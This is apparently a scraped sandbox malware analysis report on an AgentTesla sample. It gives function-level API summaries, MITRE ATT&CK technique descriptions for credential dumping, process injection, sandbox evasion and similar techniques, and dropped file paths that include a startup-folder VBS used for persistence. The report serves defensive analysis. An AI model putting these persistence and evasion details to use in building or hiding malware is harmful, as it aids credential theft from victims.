Part of subcall function 007A1487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007992C5,?,?,00000800,?,00001073,00000000,?,?), ref: 007A14B1

Part of subcall function 00747BCC: _memmove.LIBCMT ref: 00747C06

Strings

@U=u, xrefs: 007995FB, 0079962E

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: MessageSend$MemoryProcessRead_memmove
String ID: @U=u
API String ID: 339422723-2594219639
Opcode ID: 5338e0e862e14954bd6864ba2391d6d8527dac7e6a8f4820bff44654f2d7df01
Instruction ID: b8cb13ede578b07c1200e56f36b663010dfb6241581f52aefd592b470786e3ff
Opcode Fuzzy Hash: 5338e0e862e14954bd6864ba2391d6d8527dac7e6a8f4820bff44654f2d7df01
Instruction Fuzzy Hash: 05015B71801118EFDF50AE64DC85EE977ACEB19341F80C0AAFA49A7150DE750E89CB90

Function 0079953C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0079954C
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00799564

Strings

@U=u, xrefs: 0079954C, 00799564

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: 644fd81a456e67a231ee2049b0f7dada16408ab508b983905fe6e15cb9f18dde
Instruction ID: e59b8bc3f5ef3544d8f4af22764f8364a358e3d4f8c531a6865f9a9a8cfff58c
Opcode Fuzzy Hash: 644fd81a456e67a231ee2049b0f7dada16408ab508b983905fe6e15cb9f18dde
Instruction Fuzzy Hash: 34E02B35342311F6FA31152AAC4EFD71F0ADB88B61F12403CF701A92D1C9D64D6183A0

Function 007A4F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 007A4F46
_wcscmp.LIBCMT ref: 007A4F58

Strings

#32770, xrefs: 007A4F52

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: e938c5da4057674c1a7d91685cf54983908985708e21b9a8fdfc99a02ef6d7af
Instruction ID: 0da81ec4d56434d663f6fe7bd9f342e11cbe607976141a3b496b45719e488ac4
Opcode Fuzzy Hash: e938c5da4057674c1a7d91685cf54983908985708e21b9a8fdfc99a02ef6d7af
Instruction Fuzzy Hash: 58E0613350022C2BD31097559C09FA7F7ECEB81B30F000017FD00D3041D5649A15C7D1

Function 0077B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0077B314: _memset.LIBCMT ref: 0077B321

Part of subcall function 00760940: InitializeCriticalSectionAndSpinCount.KERNEL32(00804158,00000000,00804144,0077B2F0,?,?,?,0074100A), ref: 00760945

IsDebuggerPresent.KERNEL32(?,?,?,0074100A), ref: 0077B2F4
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0074100A), ref: 0077B303

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0077B2FE

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: 38ac96762a700d9c81c6bba539ae88629ba95487d25c3c7ac9e5d9e1d23e68c6
Instruction ID: 7af94a402235e3c4f1604efec121e15abd0a03d46d2ca95e5879db3ecbfed92d
Opcode Fuzzy Hash: 38ac96762a700d9c81c6bba539ae88629ba95487d25c3c7ac9e5d9e1d23e68c6
Instruction Fuzzy Hash: AFE03970200B508ADB209F29E4087467BE8FF04354F00896CE44AC6251EBBCA449CBA1

Function 00781935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 00781775

Part of subcall function 007BBFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0078195E,?), ref: 007BBFFE
Part of subcall function 007BBFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 007BC010

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0078196D

Strings

WIN_XPe, xrefs: 00781788

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: WIN_XPe
API String ID: 582185067-3257408948
Opcode ID: 2a94431f9ae2f0b02fcdd1a5c94c9e30ac1e8a65863cd3fc9609e1c97ca3f796
Instruction ID: 1d178c894d5fe5a9bd4d56f77adbb715244f736be050308a739f21eb5d5396a3
Opcode Fuzzy Hash: 2a94431f9ae2f0b02fcdd1a5c94c9e30ac1e8a65863cd3fc9609e1c97ca3f796
Instruction Fuzzy Hash: ACF0ED70841109DFDB15EB91C988BFCBBFCBB08301F940499E102A20A0D7795F85DF65

Function 007C5964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007C596E
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 007C5981

Part of subcall function 007A5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007A52BC

Strings

Shell_TrayWnd, xrefs: 007C5967

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 4bcc537193229220683482d21745624749e394b2eaa4cbfee69426cb5c629487
Instruction ID: edbddec1681fc27d7a9e7bc1ac1cf1895adada99cde4e46c5ef8ddb55a585dcc
Opcode Fuzzy Hash: 4bcc537193229220683482d21745624749e394b2eaa4cbfee69426cb5c629487
Instruction Fuzzy Hash: 20D0C971384711B7E6A4AB70AC0FFA66A25BB40B50F004829F34AAA1D0C9E89810C658

Function 007C5998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007C59AE
PostMessageW.USER32(00000000), ref: 007C59B5

Part of subcall function 007A5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007A52BC

Strings

Shell_TrayWnd, xrefs: 007C59A7

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 7f8fa183d84420cc6d9a5c2a6968cca5987c2c630c9fe26118a607e79a91f834
Instruction ID: 78f1871eeca8788c319b2b57e5d29548687e64b751fffde2d75a7effdd1fe2dc
Opcode Fuzzy Hash: 7f8fa183d84420cc6d9a5c2a6968cca5987c2c630c9fe26118a607e79a91f834
Instruction Fuzzy Hash: 17D0C971380711BBE6A4AB70AC0FF966625BB45B50F004829F346AA1D0C9E8A810C658

Function 007993DD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 007993E9
SendMessageW.USER32(00000000,00001200,00000000,00000000), ref: 007993F7

Strings

@U=u, xrefs: 007993E9, 007993F7

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: 04a113a305a126b4707554367efe5a406a1c8731403f29c5a332856ea0f37063
Instruction ID: 9a5473e74a542ae47169239f814c4a98ad685439302d65d9cab151b0722e5ab1
Opcode Fuzzy Hash: 04a113a305a126b4707554367efe5a406a1c8731403f29c5a332856ea0f37063
Instruction Fuzzy Hash: E3C00231141180BAEA211B77AC0DD873E3EE7CAF52711416CF211A51B5C6690095D728

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 28uMwHvbTD.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\aut65EA.tmp

C:\Users\user\AppData\Local\Temp\aut73C4.tmp

C:\Users\user\AppData\Local\Temp\autAEE9.tmp

C:\Users\user\AppData\Local\Temp\croc

C:\Users\user\AppData\Local\roundup\phagocytose.exe

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\phagocytose.vbs

Static File Info

General

File Icon

Static PE Info

General

Windows Analysis Report
28uMwHvbTD.exe

Function 00743B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153
windowCOMMON

Function 00743633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
timewindowregistryCOMMON

Function 007449A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 00744E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Function 007A9155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Function 0074708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00743A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Function 00743766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Function 0074301C Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 72
registrywindowclipboardCOMMON

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

